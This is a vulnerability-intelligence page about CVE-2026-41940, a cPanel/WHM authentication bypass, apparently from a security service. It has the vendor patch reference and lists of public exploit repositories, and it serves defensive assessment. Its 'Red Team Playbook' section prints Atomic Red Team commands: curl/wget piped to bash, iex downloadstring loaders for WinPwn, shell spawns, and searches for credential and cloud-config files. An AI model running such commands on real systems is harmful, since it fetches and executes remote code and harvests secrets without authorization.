CVE-2026-41940
Overview
This vulnerability is an authentication bypass affecting the login flow component of cPanel and WHM versions post-11.40. The root cause lies in improper validation of authentication tokens or session handling mechanisms, allowing unauthenticated requests to bypass normal login checks. The flaw specifically compromises the authentication logic within the web-based control panel interface, enabling unauthorized access without valid credentials.
Vulnerability Description
cPanel and WHM versions after 11.40 contain an authentication bypass vulnerability in the login flow that allows unauthenticated remote attackers to gain unauthorized access to the control panel.
Impact
An attacker can gain full unauthorized access to the cPanel control panel remotely without any authentication or user interaction. This access allows complete control over the hosting environment, including modification of website files, databases, and server configurations. The compromise can lead to data breaches, service disruption, and lateral movement within the hosting infrastructure, severely impacting business operations and data integrity.
Solution
Apply the security update released by cPanel as detailed in their advisory dated April 28, 2026, available at https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026. The update addresses the authentication bypass in versions after 11.40; administrators should upgrade to the latest patched version as specified in the vendor release notes. No alternative workarounds are recommended; prompt patching is essential to mitigate this vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cpanel | Cpanel | All |
cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
|
|
|
Cpanel | Whm | All |
cpe:2.3:a:cpanel:whm:*:*:*:*:*:*:*:*
|
|
|
Cpanel | Wp Squared | All |
cpe:2.3:a:cpanel:wp_squared:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
cPanel/WHM CRLF Injection Authentication Bypass RCE
exploits/multi/http/cpanel_whm_auth_bypass_rce
|
Sina Kheirkhah, Adam Kues, Shubham Shah +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| cPanel - CRLF Injection | nu11secur1ty | webapps | php | - | View |
GitHub PoCs (97)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ynsmroztas/cPanelSniper
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
|
ynsmroztas | 509 | 138 | 2026-05-01 | View |
|
lanicer/cve-2026-41940-PoC
A cPanel and WHM authentication bypassing tool
|
lanicer | 532 | 97 | 2026-08-19 | View |
|
ctdal/cve-2026-41940-PoC
A cPanel and WHM authentication bypassing tool
|
ctdal | 528 | 54 | 2026-09-16 | View |
|
yasouxken/cve-2026-41940-PoC
A tool for exploiting CVE-2026-41940, a critical authentication bypass in cPanel & WHM (CVSS 10.0), allowing unauthentic...
|
yasouxken | 397 | 34 | 2026-09-21 | View |
|
soverineg/cve-2026-41940-PoC
A cPanel and WHM authentication bypassing tool
|
soverineg | 322 | 43 | 2026-07-20 | View |
|
pemarine/cve-2026-41940-PoC
A cPanel and WHM authentication bypassing tool
|
pemarine | 283 | 14 | 2026-08-13 | View |
|
olofsatte/CVE-2026-41940-PoC
CVE-2026-41940 is a critical authentication bypass vulnerability affecting cPanel and WHM. This repository is designed t...
|
olofsatte | 202 | 51 | 2026-06-04 | View |
|
aquace/CVE-2026-41940-PoC
CVE-2026-41940 authentication bypass vulnerability proof-of-concept
|
aquace | 192 | 14 | 2026-06-28 | View |
|
assetnote/cpanel2shell-scanner
High fidelity scanner for CVE-2026-41940 (cPanel & WHM authentication bypass)
|
assetnote | 92 | 26 | 2026-04-30 | View |
|
XsanFlip/poc-cpanel-cve-2026-41940
|
XsanFlip | 64 | 11 | 2026-05-01 | View |
|
clsmight/CVE-2026-41940-PoC
CVE-2026-41940 exploitation proof-of-concept project
|
clsmight | 62 | 8 | 2026-06-16 | View |
|
adriyansyah-mf/cve-2026-41940-poc
|
adriyansyah-mf | 28 | 14 | 2026-04-30 | View |
|
ZeroDayEvil/CVE-2026-41940-PoC
|
ZeroDayEvil | 28 | 1 | 2026-09-28 | View |
|
Sachinart/CVE-2026-41940-cpanel-0day
CVE-2026-41940 latest cPanel & WHM 0day - 70 million websites are possible to expose by Chirag Artani
|
Sachinart | 25 | 2 | 2026-04-29 | View |
|
ilmndwntr/CVE-2026-41940-MASS-EXPLOIT
CVE-2026-41940 SUPPORT SINGLE & MASS SCAN EXPLOIT
|
ilmndwntr | 13 | 9 | 2026-04-30 | View |
|
realawaisakbar/CVE-2026-41940-Exploit-PoC
This repository contains a Proof-of-Concept (PoC) exploit for CVE-2026-41940, a critical authentication bypass vulnerabi...
|
realawaisakbar | 12 | 6 | 2026-04-30 | View |
|
Kagantua/cPanelWHM-AuthBypass
CVE-2026-41940
|
Kagantua | 10 | 7 | 2026-04-30 | View |
|
bughunt4me/cpanelCVE-2026-41940
CVE-2026-41940 Auto Root Login
|
bughunt4me | 13 | 4 | 2026-05-06 | View |
|
rfxn/cpanel-sessionscribe
Detection, mitigation, and reverse-engineering tooling for CVE-2026-41940 (SessionScribe): the cPanel/WHM unauthenticate...
|
rfxn | 13 | 1 | 2026-04-30 | View |
|
debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
Post-Exploitation Session Validation Tool for CVE-2026-41940
|
debugactiveprocess | 6 | 7 | 2026-04-29 | View |
|
Kill1234545/CVE-2026-41940
cPanel/WHM Authentication Bypass (Zero-Day Vulnerability)
|
Kill1234545 | 10 | 2 | 2026-05-01 | View |
|
tc4dy/CVE-2026-41940-PoC-Exploit
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & a...
|
tc4dy | 9 | 3 | 2026-05-12 | View |
|
Christian93111/CVE-2026-41940
cPanel/WHM Authentication Bypass (Zero-Day Vulnerability)
|
Christian93111 | 10 | 2 | 2026-05-01 | View |
|
0xYuR1/CVE-2026-41940
cPanel/WHM Authentication Bypass (Zero-Day Vulnerability)
|
0xYuR1 | 9 | 2 | 2026-05-01 | View |
|
murrez/CVE-2026-41940
PoC for CVE-2026-41940: WHM/cPanel authentication bypass chain (Python 2.7). For authorized security research and testin...
|
murrez | 8 | 1 | 2026-05-06 | View |
|
Jenderal92/CVE-2026-41940
Bulk scanner and mass exploitation tool for CVE-2026-41940 on cPanel/WHM, built for automated target validation and high...
|
Jenderal92 | 4 | 4 | 2026-05-01 | View |
|
habibkaratas/sorry-ransomware-analysis
Sorry ransomware (.sorry) IOCs, YARA rules and forensic analysis - CVE-2026-41940 cPanel campaign
|
habibkaratas | 6 | 0 | 2026-05-04 | View |
|
senyx122/CVE-2026-41940
A security research tool for detecting and analyzing cPanel/WHM services and their authentication behavior. Designed for...
|
senyx122 | 6 | 0 | 2026-05-01 | View |
|
NULL200OK/cve-2026-41940-tool
A comprehensive Python utility to **detect**, **scan in bulk**, and **exploit** the critical authentication bypass vulne...
|
NULL200OK | 3 | 2 | 2026-05-01 | View |
|
mahfuzreham/cpanel-cve-2026-41940
cPanel CVE-2026-41940 nuclear.x86 Security Audit & Cleanup Script
|
mahfuzreham | 3 | 1 | 2026-05-01 | View |
|
shahidmallaofficial/cpanel-cve-2026-41940-fix
|
shahidmallaofficial | 4 | 0 | 2026-04-30 | View |
|
CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit
Critical authentication bypass exploit for cPanel/WHM CVE-2026-41940. Leverages CRLF injection in cpsrvd daemon to gain ...
|
CerberusMrXi | 2 | 1 | 2026-07-26 | View |
|
Defacto-ridgepole254/CVE-2026-41940-Exploit-PoC
Test authentication bypass vulnerabilities in cPanel and WHM using this proof of concept exploit tool written in Go.
|
Defacto-ridgepole254 | 1 | 2 | 2026-05-06 | View |
|
Ishanoshada/CVE-2026-41940-Exploit-PoC
CVE-2026-41940 Exploit PoC – cPanel & WHM Authentication Bypass via CRLF Injection
|
Ishanoshada | 2 | 1 | 2026-05-02 | View |
|
AmirrezaMarzban/portscan-CVE-2026-41940
IP CIDRs (presumably as input, maybe command line or file) and checks ports 2083 and 2087 for openness
|
AmirrezaMarzban | 1 | 2 | 2026-05-01 | View |
|
yaunsky/cPanelWHM-AuthBypass
CVE-2026-41940
|
yaunsky | 3 | 0 | 2026-04-30 | View |
|
willygailo/CVE-2026-41940-Linux
⚠️ DISCLAIMER: This tool is intended for authorized penetration testing and educational purposes only. Using this tool a...
|
willygailo | 2 | 0 | 2026-05-27 | View |
|
44pie/cpsniper
cPanelSniper STABLE - CVE-2026-41940 optimized for 10M+ targets
|
44pie | 2 | 0 | 2026-05-10 | View |
|
0xBlackash/CVE-2026-41940
CVE-2026-41940
|
0xBlackash | 1 | 1 | 2026-05-01 | View |
|
MrOplus/CVE-2026-41940
CVE-2026-41940 Direct Shell Acess
|
MrOplus | 1 | 1 | 2026-05-02 | View |
|
MrAriaNet/cPanel-Fix
One security-remediation.sh for CVE-2026-41940 (cPanel), CVE-2026-31431 (kernel "Copy Fail"), CSF, optional domain/proxy...
|
MrAriaNet | 1 | 1 | 2026-05-01 | View |
|
Ap0dexMe0/CVE-2026-41940
cPanel & Whm Authentication Bypasser
|
Ap0dexMe0 | 2 | 0 | 2026-05-02 | View |
|
kmaruthisrikar/CVE-2026-41940-cPanel-Auth-Bypass-Exploit
|
kmaruthisrikar | 1 | 1 | 2026-05-01 | View |
|
0xabdoulaye/CPANEL-CVE-2026-41940
|
0xabdoulaye | 1 | 1 | 2026-04-30 | View |
|
merdw/cPanel-CVE-2026-41940-Scanner
Advanced cPanel & WHM Security Scanner for CVE-2026-41940. with mass Shodan discovery
|
merdw | 2 | 0 | 2026-05-01 | View |
|
Andrei-Dr/cpanel-cve-2026-41940-ioc
CVE-2026-41940 cPanel/WHM auth bypass IOC scanner — fixes false positives in upstream detection script, adds log cross-c...
|
Andrei-Dr | 2 | 0 | 2026-04-30 | View |
|
Xrzmodz444/cve-2026-41940-PoC-Linux
CVE-2026-41940 PoC - Linux/Termux Compatible Version
|
Xrzmodz444 | 0 | 1 | 2026-09-09 | View |
|
0xgh057r3c0n/CVE-2026-41940
cPanel & WHM - Authentication Bypass via Session-File CRLF Injection
|
0xgh057r3c0n | 1 | 0 | 2026-09-05 | View |
|
AnotherSec/CVE-2026-41940
CVE-2026-41940
|
AnotherSec | 1 | 0 | 2026-07-24 | View |
|
razureink/cve-2026-41940-cpanel_authbypass_reproduction
CVE Reproduction: cve-2026-41940-cpanel_authbypass_reproduction
|
razureink | 1 | 0 | 2026-07-23 | View |
|
sardine-web/Automated-scanner-CVE-2026-41940
Automated scanner & post-exploitation toolkit for CVE-2026-41940 — cPanel & WHM root authentication bypass via session-f...
|
sardine-web | 1 | 0 | 2026-05-24 | View |
|
Unleasheddotc/cve-2026-41940-exploit
improved poc of cve-2026-41940
|
Unleasheddotc | 1 | 0 | 2026-05-01 | View |
|
tc4dy/CVE-2026-41940-POC-Exploit
🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - Best Flow 💥 CRLF injection leads to auth bypass, session hijacking & a...
|
tc4dy | 1 | 0 | 2026-05-12 | View |
|
thekawix/CVE-2026-41940
cve-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator
|
thekawix | 1 | 0 | 2026-05-07 | View |
|
Richflexpix/cpanel-pwn
cPanel/WHM CVE-2026-41940 CRLF injection auth bypass exploit
|
Richflexpix | 0 | 1 | 2026-05-05 | View |
|
Unfold-Security/CVE-2026-41940-Detection
Detection signatures for CVE-2026-41940 and shemas for cPanel logs
|
Unfold-Security | 1 | 0 | 2026-05-05 | View |
|
nickpaulsec/2026-41940-poc
CVE-2026-41940: detect and exploit cpanel vuln
|
nickpaulsec | 1 | 0 | 2026-05-04 | View |
|
cy3erm/CVE-2026-41940-POC
cPanel/WHM Authentication Bypass Proof of Concept — CVE-2026-41940
|
cy3erm | 1 | 0 | 2026-05-03 | View |
|
linko-iheb/cve-2026-41940-scanner
|
linko-iheb | 1 | 0 | 2026-05-02 | View |
|
0xF55/cve-2026-41940-exploit
improved poc of cve-2026-41940
|
0xF55 | 1 | 0 | 2026-05-01 | View |
|
Lutfifakee-Project/CVE-2026-41940
cPanel/WHM CVE-2026-41940 - Mass Scanner & Exploiter
|
Lutfifakee-Project | 1 | 0 | 2026-05-01 | View |
|
Wesuiliye/CVE-2026-41940
CVE-2026-41940利用工具(go并发检测,python利用)
|
Wesuiliye | 0 | 1 | 2026-04-30 | View |
|
unteikyou/CVE-2026-41940-AuthBypass-Detector
Detection tool for cPanel/WHM CVE-2026-41940 (CRLF injection auth bypass). Verify vulnerability on servers you own or ha...
|
unteikyou | 1 | 0 | 2026-05-01 | View |
|
george1-adel/CVE-2026-41940_exploit
|
george1-adel | 1 | 0 | 2026-05-01 | View |
|
zedxod/CVE-2026-41940-POC
|
zedxod | 1 | 0 | 2026-04-30 | View |
|
hitechcloud-vietnam/cve-2026-41940-PoC
A tool for exploiting CVE-2026-41940, a critical authentication bypass in cPanel & WHM (CVSS 10.0), allowing unauthentic...
|
hitechcloud-vietnam | 0 | 0 | 2026-09-26 | View |
|
Rosemary1337/CVE-2026-41940
CVE-2026-41940 Exploit: cPanel & WHM Authentication Bypass
|
Rosemary1337 | 0 | 0 | 2026-05-01 | View |
|
t4xo/CVE-2026-41940
ts zeroday exp made by nullsec white team
|
t4xo | 0 | 0 | 2026-08-22 | View |
|
yanchenyu360/CVE-2026-41940-Security-Patch
针对CVE-2026-41940漏洞的临时缓解措施
|
yanchenyu360 | 0 | 0 | 2026-08-13 | View |
|
keithbennedict/CVE-2026-41940-Linux
|
keithbennedict | 0 | 0 | 2026-08-11 | View |
|
dann3xplo1t/Cpanel
CVE-2026-41940 cPanel & WHM Auth Bypass
|
dann3xplo1t | 0 | 0 | 2026-07-23 | View |
|
oguz-kagan-akar/CVE-2026-41940-analysis
Technical analysis of the cPanel/WHM auth bypass
|
oguz-kagan-akar | 0 | 0 | 2026-07-18 | View |
|
limo57640-crypto/cpanel-cve-41940-detector
Read-only cPanel CVE-2026-41940 IOC detector for .sorry ransomware, Mr_Rot13 Filemanager backdoors, C2 callbacks, cron, ...
|
limo57640-crypto | 0 | 0 | 2026-05-16 | View |
|
asdasddqwdq29-a11y/CVE-2026-41940
Redacted cPanel/WHM authentication bypass analysis and authorized checker
|
asdasddqwdq29-a11y | 0 | 0 | 2026-06-06 | View |
|
yurahshell/CVE-2026-41940
|
yurahshell | 0 | 0 | 2026-06-05 | View |
|
zwanski2019/cPanelSniper
CVE-2026-41940 — cPanel & WHM Authentication Bypass via Session-File CRLF Injection
|
zwanski2019 | 0 | 0 | 2026-05-04 | View |
|
xxconi/CVE-2026-41940
Private exploit
|
xxconi | 0 | 0 | 2026-05-23 | View |
|
zycoder0day/CVE-2026-41940
|
zycoder0day | 0 | 0 | 2026-05-11 | View |
|
anach-ai/CVE-2026-41940
CVE-2026-41940 — cPanel/WHM Auth Bypass By Dr.Anach, CRLF injection in `cpsrvd` Basic auth handler → unauthenticated WHM...
|
anach-ai | 0 | 0 | 2026-05-11 | View |
|
ngksiva/cpanel-forensics
Форензика после CVE-2026-41940 (cPanel/WHM) — bash-скрипт и чек-лист
|
ngksiva | 0 | 0 | 2026-05-10 | View |
|
SreejaPuthan/cpanel-control-plane-exposure-check
Defensive exposure assessment tool for identifying externally accessible cPanel, WHM, and Webmail management interfaces ...
|
SreejaPuthan | 0 | 0 | 2026-05-09 | View |
|
acuciureanu/cpanel2shell-honeypot
A Rust honeypot that simulates a vulnerable cPanel/WHM instance for CVE-2026-41940
|
acuciureanu | 0 | 0 | 2026-05-08 | View |
|
branixsolutions/Security-CVE-2026-41940-cPanel-WHM-WP2
|
branixsolutions | 0 | 0 | 2026-05-08 | View |
|
OhmGun/whmxploit---CVE-2026-41940
CVE-2026-41940
|
OhmGun | 0 | 0 | 2026-05-06 | View |
|
itsismarcos/CVE-2026-41940
Exploit CVE-2026-41940 auto exploit
|
itsismarcos | 0 | 0 | 2026-05-04 | View |
|
iSee857/cPanel-WHM-CVE-2026-41940-AuthBypass
cPanel-WHM-CVE-2026-41940-AuthBypass
|
iSee857 | 0 | 0 | 2026-05-04 | View |
|
sercanokur/CVE-2026-41940-cPanel-WHM-Verification-Tool
This repository contains a Python verification script for `CVE-2026-41940`, a critical authentication bypass vulnerabili...
|
sercanokur | 0 | 0 | 2026-05-04 | View |
|
Underh0st/CPanel-Audit-Remediation-Tool
Audit and incident response tool for CVE-2026-41940 vulnerability
|
Underh0st | 0 | 0 | 2026-05-03 | View |
|
tfawnies/CVE-2026-41940-next
|
tfawnies | 0 | 0 | 2026-05-03 | View |
|
imbas007/POC_CVE-2026-41940
|
imbas007 | 0 | 0 | 2026-05-03 | View |
|
3tternp/CVE-2026-41940---cPanel-WHM-check
This is the office check script provided by cPanel for all the users who are using cPanel
|
3tternp | 0 | 0 | 2026-05-02 | View |
|
dennisec/CVE-2026-41940
CVE-2026-41940
|
dennisec | 0 | 0 | 2026-05-02 | View |
|
vineet7800/cpanel-malware-cleaner-cve-2026
cPanel malware, CVE-2026-41940, virus removal
|
vineet7800 | 0 | 0 | 2026-05-01 | View |
|
devtint/CVE-2026-41940
https://devtint.github.io/CVE-2026-41940
|
devtint | 0 | 0 | 2026-05-01 | View |
|
rdyprtmx/poc-cve-2026-41940
|
rdyprtmx | 0 | 0 | 2026-04-30 | View |
|
ZildanZ/CVE-2026-41940
|
ZildanZ | 0 | 0 | 2026-05-05 | View |
|
0dev1337/cpanelscanner
Cpanel Scanner For CVE-2026-41940
|
0dev1337 | 0 | 0 | 2026-05-01 | View |
Threat Feed
34 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Active exploitation confirmed with 287 sighting(s)
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
59 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
for pid in $(pgrep -f 'Runner.Worker|Runner.Listener|runsvc|run.sh' 2>/dev/null); do tr '\0' '\n' < /proc/$pid/environ 2>/dev/null | grep -iE 'env|ssh'; done
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path} -maxdepth 6 -name "#{filename}" -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.aws/#{filename}' -type f 2>/dev/null
find #{file_path} -path '*/.azure/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.docker/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.config/gcloud/#{filename}' -type f #{optional_flags} 2>/dev/null
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /root -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find /etc/kubernetes -name '*.conf' -type f #{optional_flags} 2>/dev/null
find #{file_path} -path '*/.kube/config' -type f #{optional_flags} 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for filename in #{filenames}; do find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null; done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
for filename in #{filenames}; do
find #{file_path} -name "$filename" -type f #{optional_flags} 2>/dev/null
done
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
find /etc/mysql -name 'my.cnf' -type f #{optional_flags} 2>/dev/null
find /etc/redis -name 'redis.conf' -type f #{optional_flags} 2>/dev/null
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
find #{file_path} -name '#{filename}' -type f #{optional_flags} 2>/dev/null
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.